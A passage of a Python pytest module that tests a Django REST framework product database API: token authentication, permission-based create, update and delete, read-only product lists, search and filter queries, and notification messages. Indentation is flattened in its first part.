    today_string = DateFormat(datetime.now()).format(get_format(settings.SHORT_DATE_FORMAT))

    def test_token_authentication(self, live_server):
        """A valid API token grants access, an invalid token is rejected."""
        token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
        resp = requests.get(live_server + REST_PRODUCT_LIST, headers={
            "Authorization": "Token %s" % token.key
        })
        assert resp.status_code == status.HTTP_200_OK, resp.text
        # the same request with a bogus token must be refused
        resp = requests.get(live_server + REST_PRODUCT_LIST, headers={
            "Authorization": "Token invalid_token"
        })
        assert resp.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": "12.32",
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": self.today_string
}
]
}
p = mixer.blend("productdb.Product", list_price=12.32)
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % p.id
expected_result["data"][0]["product_id"] = p.product_id
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCT_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
assert jdata["pagination"]["total_records"] == 1, "unexpected result from API endpoint"
assert jdata == expected_result, "unexpected result from API endpoint"
# access first element of the list
response = client.get(jdata["data"][0]["url"])
assert response.status_code == status.HTTP_200_OK
assert jdata["data"][0] == response.json()
def test_add_access_with_permission(self):
test_user = "user"
test_product_id = "Test Product ID"
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"eol_reference_number": None,
"product_group": None,
"end_of_sale_date": None,
"description": "",
"vendor": 0,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": 0,
"product_id": test_product_id,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_product")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_product")
client = APIClient()
client.login(username=test_user, password=test_user)
# create with name
response = client.post(REST_PRODUCT_LIST, data={"product_id": test_product_id})
assert response.status_code == status.HTTP_201_CREATED, response.content.decode()
# adjust ID values from Database
expected_result["id"] = Product.objects.get(product_id=test_product_id).id
expected_result["url"] = "http://testserver/productdb/api/v1/products/%d/" % expected_result["id"]
assert response.json() == expected_result, "Should provide the new product"
def test_create_product_with_lc_state_sync_field(self):
test_user = "user"
test_product_id = "Test Product ID"
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"eol_reference_number": None,
"product_group": None,
"end_of_sale_date": None,
"description": "",
"vendor": 0,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": 0,
"product_id": test_product_id,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_product")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_product")
client = APIClient()
client.login(username=test_user, password=test_user)
# create with name
response = client.post(REST_PRODUCT_LIST, data={"product_id": test_product_id, "lc_state_sync": True})
assert response.status_code == status.HTTP_201_CREATED
# adjust ID values from Database
expected_result["id"] = Product.objects.get(product_id=test_product_id).id
expected_result["url"] = "http://testserver/productdb/api/v1/products/%d/" % expected_result["id"]
assert response.json() == expected_result, "Should provide the new product"
def test_change_lc_state_sync(self):
p = mixer.blend("productdb.Product", product_id="product ID")
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"eol_reference_number": None,
"product_group": None,
"end_of_sale_date": None,
"description": "",
"vendor": 0,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": 0,
"product_id": p.product_id,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
perm = Permission.objects.get(codename="change_product")
assert perm is not None
u.user_permissions.add(perm)
u.save()
assert u.has_perm("productdb.change_product")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCT_DETAIL % p.id, data={
"product_id": p.product_id,
"lc_state_sync": True
})
assert response.status_code == status.HTTP_200_OK
# adjust pk value
expected_result["id"] = Product.objects.get(product_id="product ID").id
expected_result["url"] = expected_result["url"] % expected_result["id"]
assert response.json() == expected_result
def test_change_access_with_permission(self):
p = mixer.blend("productdb.Product", product_id="product ID")
test_renamed_product = "renamed product"
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"eol_reference_number": None,
"product_group": None,
"end_of_sale_date": None,
"description": "",
"vendor": 0,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": 0,
"product_id": test_renamed_product,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
perm = Permission.objects.get(codename="change_product")
assert perm is not None
u.user_permissions.add(perm)
u.save()
assert u.has_perm("productdb.change_product")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCT_DETAIL % p.id, data={"product_id": test_renamed_product})
assert response.status_code == status.HTTP_200_OK
# adjust pk value
expected_result["id"] = Product.objects.get(product_id=test_renamed_product).id
expected_result["url"] = expected_result["url"] % expected_result["id"]
assert response.json() == expected_result
def test_change_product_group(self):
v1 = Vendor.objects.get(id=1)
v2 = Vendor.objects.get(id=2)
invalid_pg = mixer.blend("productdb.ProductGroup", name="invalid product group", vendor=v2)
valid_pg = mixer.blend("productdb.ProductGroup", name="valid product group", vendor=v1)
p = mixer.blend("productdb.Product", product_id="product ID", vendor=v1)
expected_result = {
"currency": "USD",
"end_of_service_contract_renewal": None,
"eol_reference_url": None,
"url": "http://testserver/productdb/api/v1/products/%d/" % p.id,
"eol_reference_number": None,
"product_group": valid_pg.id,
"end_of_sale_date": None,
"description": "",
"vendor": v1.id,
"tags": "",
"list_price": None,
"eol_ext_announcement_date": None,
"eox_update_time_stamp": None,
"end_of_new_service_attachment_date": None,
"end_of_support_date": None,
"end_of_sw_maintenance_date": None,
"end_of_sec_vuln_supp_date": None,
"end_of_routine_failure_analysis": None,
"id": p.id,
"product_id": p.product_id,
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
client = APIClient()
client.login(**SUPER_USER)
# try to associate the product to a product group of a different vendor
response = client.put(REST_PRODUCT_DETAIL % p.id, data={
"product_id": p.product_id,
"product_group": invalid_pg.id
})
assert response.status_code == status.HTTP_400_BAD_REQUEST
jdata = response.json()
assert len(jdata) == 1, "Should contain a single error message"
assert "product_group" in jdata
assert "Invalid product group, group and product must be associated to the same vendor" in str(jdata)
# try to associate the product to a product group of the same vendor
response = client.put(REST_PRODUCT_DETAIL % p.id, data={
"product_id": p.product_id,
"product_group": valid_pg.id
})
assert response.status_code == status.HTTP_200_OK
assert response.json() == expected_result
def test_delete_access_with_permission(self):
p = mixer.blend("productdb.Product")
assert Product.objects.count() == 1
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
perm = Permission.objects.get(codename="delete_product")
assert perm is not None
u.user_permissions.add(perm)
u.save()
assert u.has_perm("productdb.delete_product")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_PRODUCT_DETAIL % p.id)
assert response.status_code == status.HTTP_204_NO_CONTENT
assert Product.objects.count() == 0
def test_count_endpoint(self):
mixer.blend("productdb.Product", name="product 1")
mixer.blend("productdb.Product", name="product 2")
mixer.blend("productdb.Product", name="product 3")
assert Product.objects.count() == 3
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCT_COUNT)
assert response.status_code == status.HTTP_200_OK
assert response.json() == {'count': 3}
def test_search_field_by_product_id(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 2,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 2
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 21",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
},
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
for e in range(0, 5):
Product.objects.create(product_id="test product %d" % e)
for e in range(1, 3):
p = Product.objects.create(product_id="product 2%d" % e)
expected_result["data"][e-1]["id"] = p.id
expected_result["data"][e-1]["url"] = expected_result["data"][e-1]["url"] % p.id
client = APIClient()
client.login(**AUTH_USER)
# search by product ID (with regular expression
response = client.get(REST_PRODUCT_LIST + "?search=" + quote("^product \d+$"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == len(expected_result["data"]), \
"Should contain the same amount of elements as the expected result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_search_field_by_product_description(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 2,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 2
},
"data": [
{
"id": 0,
"list_price": None,
"description": "my search description",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 21",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
},
{
"id": 0,
"list_price": None,
"description": "other search description",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
for e in range(0, 5):
Product.objects.create(product_id="test product %d" % e, description=str(e))
for e in range(1, 3):
p = Product.objects.create(
product_id="product 2%d" % e,
description=expected_result["data"][e-1]["description"]
)
expected_result["data"][e-1]["id"] = p.id
expected_result["data"][e-1]["url"] = expected_result["data"][e-1]["url"] % p.id
client = APIClient()
client.login(**AUTH_USER)
# search by product ID (with regular expression
response = client.get(REST_PRODUCT_LIST + "?search=" + quote("^\w+ search description$"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == len(expected_result["data"]), \
"Should contain the same amount of elements as the expected result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_id_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
p = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["vendor"] = p.vendor.id
expected_result["data"][0]["product_id"] = p.product_id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert Product.objects.count() == 2
client = APIClient()
client.login(**AUTH_USER)
# use vendor field (startswith)
response = client.get(REST_PRODUCT_LIST + "?id=" + str(p.id))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_product_id_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
p = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["vendor"] = p.vendor.id
expected_result["data"][0]["product_id"] = p.product_id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert Product.objects.count() == 2
client = APIClient()
client.login(**AUTH_USER)
# use product_id (exact match)
response = client.get(REST_PRODUCT_LIST + "?product_id=" + quote(p.product_id))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
# use incomplete product_id
response = client.get(REST_PRODUCT_LIST + "?product_id=" + quote(p.product_id[:5]))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 0, "Should return no element"
def test_filter_vendor_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=2))
p = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["vendor"] = p.vendor.id
expected_result["data"][0]["product_id"] = p.product_id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert Product.objects.count() == 2
client = APIClient()
client.login(**AUTH_USER)
# use vendor field (startswith)
response = client.get(REST_PRODUCT_LIST + "?vendor=" + quote("Cisco"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_product_group_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 0,
"list_price": None,
"description": "",
"eol_reference_url": None,
"eol_ext_announcement_date": None,
"url": "http://testserver/productdb/api/v1/products/%d/",
"end_of_sec_vuln_supp_date": None,
"end_of_service_contract_renewal": None,
"end_of_support_date": None,
"eol_reference_number": None,
"end_of_sw_maintenance_date": None,
"tags": "",
"vendor": 0,
"product_id": "product 22",
"end_of_routine_failure_analysis": None,
"end_of_sale_date": None,
"eox_update_time_stamp": None,
"product_group": None,
"end_of_new_service_attachment_date": None,
"currency": "USD",
"lc_state_sync": False,
"internal_product_id": None,
"update_timestamp": self.today_string,
"list_price_timestamp": None
}
]
}
v1 = Vendor.objects.get(id=1)
v2 = Vendor.objects.get(id=2)
mixer.blend(
"productdb.Product",
vendor=v2,
product_group=mixer.blend("productdb.ProductGroup", vendor=v2)
)
pg = mixer.blend("productdb.ProductGroup", vendor=v1)
p = mixer.blend("productdb.Product", vendor=v1, product_group=pg)
expected_result["data"][0]["id"] = p.id
expected_result["data"][0]["vendor"] = p.vendor.id
expected_result["data"][0]["product_id"] = p.product_id
expected_result["data"][0]["product_group"] = pg.id
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert Product.objects.count() == 2
client = APIClient()
client.login(**AUTH_USER)
# use product_group field (exact match)
response = client.get(REST_PRODUCT_LIST + "?product_group=" + quote(pg.name))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
# use incomplete product_group field
response = client.get(REST_PRODUCT_LIST + "?product_group=" + quote(pg.name[:5]))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 0, "Should return no element"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductListAPIEndpoint:
    """Django REST framework API endpoint tests for the Product List model"""
    TEST_PRODUCTS = [
        "Product A",
        "Product B",
        "Product C",
        "Product D",
        "Product E"
    ]
    TEST_PRODUCT_LIST_NAME = "Test Product List"

    def create_test_data(self):
        """Create one Product per entry in TEST_PRODUCTS."""
        for e in self.TEST_PRODUCTS:
            mixer.blend("productdb.Product", product_id=e)

    def create_test_product_list(self):
        """Create the test products plus a ProductList containing all of them.

        Returns the primary key of the created ProductList.
        """
        self.create_test_data()
        u = User.objects.get(username="pdb_admin")
        pl = mixer.blend(
            "productdb.ProductList",
            name=self.TEST_PRODUCT_LIST_NAME,
            description="<strong>Test Liste</strong>\nJust a test list",
            string_product_list="\n".join(self.TEST_PRODUCTS),
            update_user=u
        )
        return pl.id

    def test_token_authentication(self, live_server):
        """A valid DRF token grants access; an invalid token yields 401."""
        token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
        response = requests.get(live_server + REST_PRODUCTLIST_LIST, headers={
            "Authorization": "Token %s" % token.key
        })
        assert response.status_code == status.HTTP_200_OK, response.text

        response = requests.get(live_server + REST_PRODUCTLIST_LIST, headers={
            "Authorization": "Token invalid_token"
        })
        assert response.status_code == status.HTTP_401_UNAUTHORIZED

    def test_read_access_with_authenticated_user(self):
        """List endpoint returns the expected pagination/data payload, and the
        detail URL embedded in the list entry resolves to the same record."""
        self.create_test_data()
        expected_result = {
            "pagination": {
                "page_records": 1,
                "total_records": 1,
                "url": {
                    "previous": None,
                    "next": None
                },
                "page": 1,
                "last_page": 1
            },
            "data": [
                {
                    "id": 0,
                    "name": "TestList",
                    "description": "<strong>Test Liste</strong>\nJust a test list",
                    "string_product_list": self.TEST_PRODUCTS,
                    "update_date": "",
                    "contact_email": "",
                    "url": "http://testserver/productdb/api/v1/productlists/%d/"
                }
            ]
        }
        u = User.objects.get(username="api")
        pl = mixer.blend(
            "productdb.ProductList",
            name=expected_result["data"][0]["name"],
            description=expected_result["data"][0]["description"],
            string_product_list="\n".join(expected_result["data"][0]["string_product_list"]),
            update_user=u
        )
        # fill in the values that are only known after object creation
        expected_result["data"][0]["id"] = pl.id
        expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pl.id
        expected_result["data"][0]["update_date"] = pl.update_date.strftime("%Y-%m-%d")
        expected_result["data"][0]["contact_email"] = u.email

        client = APIClient()
        client.login(**AUTH_USER)
        response = client.get(REST_PRODUCTLIST_LIST)

        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not found in result"
        assert jdata["pagination"]["total_records"] == 1, "unexpected result from API endpoint"
        assert jdata == expected_result, "unexpected result from API endpoint"

        # access first element of the list
        response = client.get(jdata["data"][0]["url"])

        assert response.status_code == status.HTTP_200_OK
        assert jdata["data"][0] == response.json()

    def test_add_access_with_permission(self):
        """add action through API for Product List not supported"""
        self.create_test_data()
        test_user = "user"
        test_product_list_id = "Test Product List"
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename="add_productlist")
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("productdb.add_productlist")

        client = APIClient()
        client.login(username=test_user, password=test_user)

        # create with name
        response = client.post(REST_PRODUCTLIST_LIST, data={"name": test_product_list_id})

        # the endpoint is read-only, even for users holding the add permission
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
        assert response.json() == {'detail': 'Method "POST" not allowed.'}
        assert ProductList.objects.count() == 0, "no product list was created"

    def test_change_access_with_permission(self):
        """change action through API for Product List not supported"""
        pl_id = self.create_test_product_list()

        # create a user with permissions
        test_user = "user"
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename="change_productlist")
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("productdb.change_productlist")

        client = APIClient()
        client.login(username=test_user, password=test_user)
        response = client.put(REST_PRODUCTLIST_DETAIL % pl_id, data={"name": "renamed product list"})

        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "PUT" not allowed.'}

    def test_delete_access_with_permission(self):
        """delete action through API for Product List not supported"""
        pl_id = self.create_test_product_list()
        test_user = "user"
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename="delete_productlist")
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("productdb.delete_productlist")

        client = APIClient()
        client.login(username=test_user, password=test_user)
        response = client.delete(REST_PRODUCTLIST_DETAIL % pl_id)

        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
        assert ProductList.objects.count() == 1, "no product list was deleted"

    def test_filter_fields(self):
        """Exercise the id, name (contains) and description (contains) filters."""
        pl_id = self.create_test_product_list()
        mixer.blend("productdb.ProductList", name="Product List", string_product_list="Product A")
        expected_result = {
            "pagination": {
                "page_records": 1,
                "total_records": 1,
                "url": {
                    "previous": None,
                    "next": None
                },
                "page": 1,
                "last_page": 1
            },
            "data": [
                {
                    "id": 0,
                    "name": self.TEST_PRODUCT_LIST_NAME,
                    "description": "<strong>Test Liste</strong>\nJust a test list",
                    "string_product_list": self.TEST_PRODUCTS,
                    "update_date": "",
                    "contact_email": "admin@localhost.localhost",
                    "url": "http://testserver/productdb/api/v1/productlists/%d/"
                }
            ]
        }
        expected_result["data"][0]["id"] = pl_id
        expected_result["data"][0]["update_date"] = date.today().strftime("%Y-%m-%d")
        expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pl_id

        client = APIClient()
        client.login(**AUTH_USER)

        # use ID field filter (exact match)
        response = client.get(REST_PRODUCTLIST_LIST + "?id=%d" % pl_id)

        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"

        # use name field (contains)
        response = client.get(REST_PRODUCTLIST_LIST + "?name=" + quote(self.TEST_PRODUCT_LIST_NAME.lower()))

        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"

        # use description field (contains)
        response = client.get(REST_PRODUCTLIST_LIST + "?description=" + quote("Just a test"))

        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestNotificationMessageAPIEndpoint:
    """Django REST Framework API endpoint tests for the NotificationMessage model"""
    # today's date formatted with the project's SHORT_DATE_FORMAT (shared fixture value)
    today_string = DateFormat(datetime.now()).format(get_format(settings.SHORT_DATE_FORMAT))

    def test_token_authentication(self, live_server):
        """A valid DRF token grants access; an invalid token yields 401."""
        token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
        response = requests.get(live_server + REST_NOTIFICATIONMESSAGES_LIST, headers={
            "Authorization": "Token %s" % token.key
        })
        assert response.status_code == status.HTTP_200_OK, response.text

        response = requests.get(live_server + REST_NOTIFICATIONMESSAGES_LIST, headers={
            "Authorization": "Token invalid_token"
        })
        assert response.status_code == status.HTTP_401_UNAUTHORIZED

    def test_read_access_with_authenticated_user(self):
        """List endpoint returns the created notification message verbatim."""
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 1,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 1
            },
            "data": [
                {
                    "id": 1,
                    "title": "FooBar",
                    "type": "INFO",
                    "summary_message": "Test",
                    "detailed_message": "Test",
                    "created": ""
                }
            ]
        }
        nm = mixer.blend("config.NotificationMessage")
        # fill in the values that are only known after object creation
        expected_result["data"][0]["id"] = nm.id
        expected_result["data"][0]["title"] = nm.title
        expected_result["data"][0]["summary_message"] = nm.summary_message
        expected_result["data"][0]["detailed_message"] = nm.detailed_message
        expected_result["data"][0]["created"] = nm.created.isoformat().replace("+00:00", "Z")

        client = APIClient()
        client.login(**AUTH_USER)
        response = client.get(REST_NOTIFICATIONMESSAGES_LIST)

        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not found in result"
